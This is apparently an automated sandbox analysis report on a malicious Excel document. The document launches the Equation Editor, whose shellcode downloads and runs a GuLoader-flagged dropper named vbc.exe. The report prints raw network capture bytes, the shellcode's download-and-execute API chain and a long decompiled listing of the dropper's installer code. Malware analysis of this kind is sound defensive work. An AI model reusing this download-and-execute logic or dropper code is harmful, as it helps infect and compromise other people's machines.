Nov 29, 2022 08:13:05.603611946 CET	11	IN	Data Raw: 20 a0 40 00 50 8d 45 80 51 50 ff 15 e0 81 40 00 83 c4 0c 8d 45 80 50 ff 75 08 ff 15 60 82 40 00 8d 45 80 50 68 06 04 00 00 ff 75 08 e8 24 2b 00 00 33 c0 c9 c2 10 00 8b 0d d0 8e 41 00 a1 e0 8e 41 00 3b c8 7c 02 8b c8 50 6a 64 51 ff 15 54 81 40 00 Data Ascii: @PEQP@EPu`@EPhu$+3AA;\|PjdQT@UV39utA;tPT@5Av95AtV7f@;LBvX95HBt-BtGPEh@P@EPV$#Vh-@Vjo5@B@jPAh@^
Nov 29, 2022 08:13:05.603638887 CET	12	IN	Data Raw: bf 00 40 00 00 2b 05 e4 8e 41 00 3b c7 7f 02 8b f8 be d0 4e 41 00 57 56 e8 e9 00 00 00 85 c0 0f 84 c2 00 00 00 01 3d e4 8e 41 00 89 35 60 ce 40 00 89 3d 64 ce 40 00 39 1d 50 a2 42 00 74 29 39 1d e0 a2 42 00 75 21 a1 e0 8e 41 00 53 2b 05 d4 8e 41 Data Ascii: @+A;NAWV=A5`@=d@9PBt)9Bu!AS+A+D$@@AYH@-h@l@3\|j5h@+t!VU5@+tK5@@9d@u9d@u7;t3A+@@L$%SSP5@H@jjX
Nov 29, 2022 08:13:05.603666067 CET	13	IN	Data Raw: 2a 00 00 bd 00 68 43 00 55 56 ff 15 18 81 40 00 85 c0 74 97 3b fb 56 74 07 e8 36 20 00 00 eb 05 e8 ac 20 00 00 56 ff 15 70 80 40 00 66 39 1d 00 58 43 00 75 0b 55 68 00 58 43 00 e8 e6 29 00 00 ff 74 24 18 68 00 b0 42 00 e8 d8 29 00 00 0f b7 05 16 Data Ascii: *hCUV@t;Vt6 Vp@f9XCuUhXC)t$hB)@@jB]BPB W)WD@9\$t?jWhC@t-SW"(PB$W)WJ ;tP @\$fBMuSV'9Bt\|D$Pj(
Nov 29, 2022 08:13:05.724899054 CET	15	IN	Data Raw: ff 6a 01 e8 b1 fc ff ff 8b c6 eb 2b 57 e8 40 17 00 00 85 c0 74 18 39 3d 0c 92 42 00 0f 85 4e ff ff ff 6a 02 e8 f0 d6 ff ff e9 42 ff ff ff 6a 01 e8 e4 d6 ff ff 33 c0 5f 5e 5d 5b 83 c4 10 c3 53 55 56 57 bf 00 70 43 00 bb ff ff 00 00 57 e8 2d 24 00 Data Ascii: j+W@t9=BNjBj3_^][SUVWpCW-$5BtEPBIdBNf)f3#ftuQ BQBQufu3BPW#jh@Br$P57B`@lB5hBtt

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 1036, Parent PID: 576

General

Target ID:	0
Start time:	08:12:24
Start date:	29/11/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f8d0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 1168, Parent PID: 576

General

Target ID:	2
Start time:	08:12:45
Start date:	29/11/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 1136, Parent PID: 1168

General

Target ID:	5
Start time:	08:12:50
Start date:	29/11/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x400000
File size:	477800 bytes
MD5 hash:	7081C4822CF1C7572DD82822B8F27C49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet1"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True
17	Attribute VB_Name = "Sheet1"
18	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
19	Attribute VB_GlobalNameSpace = False
20	Attribute VB_Creatable = False
21	Attribute VB_PredeclaredId = True
22	Attribute VB_Exposed = True
23	Attribute VB_TemplateDerived = False
24	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet2"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True
17	Attribute VB_Name = "Sheet2"
18	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
19	Attribute VB_GlobalNameSpace = False
20	Attribute VB_Creatable = False
21	Attribute VB_PredeclaredId = True
22	Attribute VB_Exposed = True
23	Attribute VB_TemplateDerived = False
24	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet3"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True
17	Attribute VB_Name = "Sheet3"
18	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
19	Attribute VB_GlobalNameSpace = False
20	Attribute VB_Creatable = False
21	Attribute VB_PredeclaredId = True
22	Attribute VB_Exposed = True
23	Attribute VB_TemplateDerived = False
24	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "ThisWorkbook"
10	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True
17	Attribute VB_Name = "ThisWorkbook"
18	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
19	Attribute VB_GlobalNameSpace = False
20	Attribute VB_Creatable = False
21	Attribute VB_PredeclaredId = True
22	Attribute VB_Exposed = True
23	Attribute VB_TemplateDerived = False
24	Attribute VB_Customizable = True

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1168, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	26.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	73.3%
Total number of Nodes:	150
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03540660 Relevance: 6.1, APIs: 4, Instructions: 84
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(03540652), ref: 03540660

Part of subcall function 0354067A: URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
Part of subcall function 0354067A: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
Part of subcall function 0354067A: ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 02a2dee4c8732a7e15e4c17dbbbb36d9ea9e33976a4740b631ee41f00cedfad9
Instruction ID: 5c3ee148dd10b3fd2609992eb9c2c75b322724d5da4e0868704eda23c0794a1a
Opcode Fuzzy Hash: 02a2dee4c8732a7e15e4c17dbbbb36d9ea9e33976a4740b631ee41f00cedfad9
Instruction Fuzzy Hash: 41216DB284D3C12FD71797301D6AB55BF246FA3508F6989CEE2830A4E3E6989401CB97

Uniqueness

Uniqueness Score: -1.00%

Function 035405D4 Relevance: 4.6, APIs: 3, Instructions: 139
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 3320bcba38fa063cb6f606931eef2dd3b06928eb0787620feb1c45b37fd53f9a
Instruction ID: d60a90bafd8f616295f5c2cffa6b0eb50432fc26f78bf95106a7ab00b03c51b2
Opcode Fuzzy Hash: 3320bcba38fa063cb6f606931eef2dd3b06928eb0787620feb1c45b37fd53f9a
Instruction Fuzzy Hash: BB41ACB584D3C12FD71A97302D6A655FF247F93108F6D86CE92830B0F3E2589506C796

Uniqueness

Uniqueness Score: -1.00%

Function 035405F0 Relevance: 4.6, APIs: 3, Instructions: 130
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 80b1ad9e23ea0a56d06c276fcb09e5d018fbaa1d8f322c6cb7171492dfcef268
Instruction ID: 2a8c97b8a23b072019b24361cabb0795d79956d6343e4088509fe9743157a58d
Opcode Fuzzy Hash: 80b1ad9e23ea0a56d06c276fcb09e5d018fbaa1d8f322c6cb7171492dfcef268
Instruction Fuzzy Hash: 0341BCA644D3C12FD71A97302E6AB55FF24BF93108F6D8ACE92830B0F3D6989505C796

Uniqueness

Uniqueness Score: -1.00%

Function 0354067A Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 9e2844a2488e4e023d4788b719639aedcf1a943f5860e9713c47ba1109e8ef9e
Instruction ID: 0f1616c7ea230f2a6d447a1bae117742a47b2e57e5a552c07a71529c8d876d7f
Opcode Fuzzy Hash: 9e2844a2488e4e023d4788b719639aedcf1a943f5860e9713c47ba1109e8ef9e
Instruction Fuzzy Hash: 91216DA284D3C12ED71797301C6DB55BF646FA3508F6989CEE2C30A4E3E6988401C757

Uniqueness

Uniqueness Score: -1.00%

Function 035406CF Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1

Part of subcall function 035406E8: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
Part of subcall function 035406E8: ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: fa1a5308e493a091ac73bd33789bf1066c8881defea730fd15e1ed18650b5440
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 7AF0527154C38039E619E3702E4AF59EE28BFC1B48F340889B3030F0F3D88498008A5A

Uniqueness

Uniqueness Score: -1.00%

Function 035406FD Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F

Part of subcall function 03540722: ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 801ca229bc4037096efb824ac8ea90e748e78a849997108cced168d5aae82a4e
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 85012B7655434220EB3CE6246B45BB5FB15FB41708FFC8856AB81070F5D168A0C74E5B

Uniqueness

Uniqueness Score: -1.00%

Function 035406E8 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 989db728c6de23c23e21ee3f9a08a34b46ef8adc9778a241fdc1dcf0fce79b61
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 06012B3155434130E76CE2246E85BA9FE85FB8174CFB8485AF3420B0F5C294A4478E1F

Uniqueness

Uniqueness Score: -1.00%

Function 03540722 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 03540727

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03540729 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: d9e727dcfea0cdbd732ee6216a362d07c84af5188421cc045bae81acaf1f72f4
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: EBD05E35201502CFD308DB04DA40E52F37AFFC4219B24C264D1004BB69C330E892CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 035405BB Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(035405A9), ref: 035405BB

Memory Dump Source

Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 958262e208b55d661c3b1503d2cfcb295935e557f8728379d0128cc62aa1e079
Instruction ID: 6314361b880b964c2bd40b70617453fd87355de62743f23d5afa5d3eb7b70bc7
Opcode Fuzzy Hash: 958262e208b55d661c3b1503d2cfcb295935e557f8728379d0128cc62aa1e079
Instruction Fuzzy Hash: 6C11D07540E7C18FD30AE7707A6A055FF20B993108B2C86CBC2870B1F3D218964A93D6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 1136, Parent PID: 1168COMMON

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.4%
Total number of Nodes:	1571
Total number of Limit Nodes:	49

Executed Functions

Function 0040344A Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				intOrPtr _t54;
				WCHAR* _t58;
				char* _t61;
				void* _t64;
				void* _t66;
				int _t68;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t171;
				int* _t173;
				signed int _t179;
				signed int _t182;
				CHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				char* _t191;
				void* _t194;
				void* _t195;
				void* _t238;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t147 = E004065EC(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t183 = "UXTHEME";
				do {
					E0040657C(_t183); // executed
					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
				} while ( *_t183 != 0);
				E004065EC(9);
				_t54 = E004065EC(7);
				 *0x42a244 = _t54;
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x42a2f8 = _t54;
				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E00406212(0x429240, L"NSIS Error");
				_t58 = GetCommandLineW();
				_t191 = L"\"C:\\Users\\Public\\vbc.exe\" ";
				E00406212(_t191, _t58);
				 *0x42a240 = GetModuleHandleW(_t149);
				_t61 = _t191;
				if(L"\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
					_t61 =  &M00435002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405BF3(_t61, _t169));
				 *(_t195 + 0x18) = _t153;
				_t64 =  *_t153;
				if(_t64 == _t149) {
					L30:
					_t184 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t184);
					_t66 = E00403419(_t153, 0);
					_t220 = _t66;
					if(_t66 != 0) {
						L33:
						DeleteFileW(L"1033");
						_t68 = E00402ED5(_t222,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t68;
						if(_t68 != _t149) {
							L45:
							E00403969();
							__imp__OleUninitialize();
							_t234 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x42a2d4 - _t149;
								if( *0x42a2d4 == _t149) {
									L69:
									_t70 =  *0x42a2ec;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E004065EC(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L67:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L69;
									}
									goto L68;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L68:
										E0040140B(9);
										goto L69;
									}
									goto L67;
								}
							}
							E00405957( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a25c == _t149) {
							L44:
							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
							 *(_t195 + 0x14) = E00403A5B( *0x42a2ec);
							goto L45;
						}
						_t173 = E00405BF3(_t191, _t149);
						if(_t173 < _t191) {
							L41:
							_t231 = _t173 - _t191;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t173 < _t191) {
								_t171 = E004058DA(_t234);
								lstrcatW(_t184, L"~nsu");
								if(_t171 != _t149) {
									lstrcatW(_t184, "A");
								}
								lstrcatW(_t184, L".tmp");
								_t193 = L"C:\\Users\\Public";
								if(lstrcmpiW(_t184, L"C:\\Users\\Public") != 0) {
									_push(_t184);
									if(_t171 == _t149) {
										E004058BD();
									} else {
										E00405840();
									}
									SetCurrentDirectoryW(_t184);
									_t238 = L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93" - _t149; // 0x43
									if(_t238 == 0) {
										E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t193);
									}
									E00406212(L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									L"51118080" = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(0x438800, 0x420ee8, 1) != 0) {
											E004060B3(_t154, 0x420ee8, _t149);
											E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
											_t101 = E004058F2(0x420ee8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										L"51118080" =  &(L"51118080"[0]);
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E004060B3(_t154, _t184, _t149);
								}
								goto L45;
							}
							 *_t173 = _t149;
							_t174 =  &(_t173[2]);
							if(E00405CCE(_t231,  &(_t173[2])) == 0) {
								goto L45;
							}
							E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t174);
							E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac", _t174);
							 *(_t195 + 0x10) = _t149;
							goto L44;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t173 != _t157 || _t173[1] != _t118) {
							_t173 = _t173;
							if(_t173 >= _t191) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L41;
					}
					GetWindowsDirectoryW(_t184, 0x3fb);
					lstrcatW(_t184, L"\\Temp");
					_t121 = E00403419(_t153, _t220);
					_t221 = _t121;
					if(_t121 != 0) {
						goto L33;
					}
					GetTempPathW(0x3fc, _t184);
					lstrcatW(_t184, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t184);
					SetEnvironmentVariableW(L"TMP", _t184);
					_t126 = E00403419(_t153, _t221);
					_t222 = _t126;
					if(_t126 == 0) {
						goto L45;
					}
					goto L33;
				} else {
					goto L8;
				}
				do {
					L8:
					_t152 = 0x20;
					if(_t64 != _t152) {
						L10:
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t152 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L24;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t146 =  *((intOrPtr*)(_t153 + 2));
								if(_t146 == 0x20 || _t146 == 0) {
									 *0x42a2e0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
								_t145 =  *((intOrPtr*)(_t153 + 8));
								if(_t145 == 0x20 || _t145 == 0) {
									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
								goto L24;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t153);
								L29:
								_t149 = 0;
								goto L30;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t152);
					goto L10;
					L24:
					_t153 = E00405BF3(_t153, _t152);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t64 =  *_t153;
				} while (_t64 != 0);
				goto L29;
			}

0x00403455
0x00403456
0x0040345d
0x00403461
0x00403469
0x0040346d
0x0040347d
0x00403480
0x00403487
0x0040348e
0x0040348e
0x00403487
0x00403490
0x00403495
0x00403496
0x004034a2
0x004034a6
0x004034ae
0x004034b5
0x004034ba
0x004034bf
0x004034c6
0x004034cc
0x004034e2
0x004034f2
0x004034f7
0x004034fd
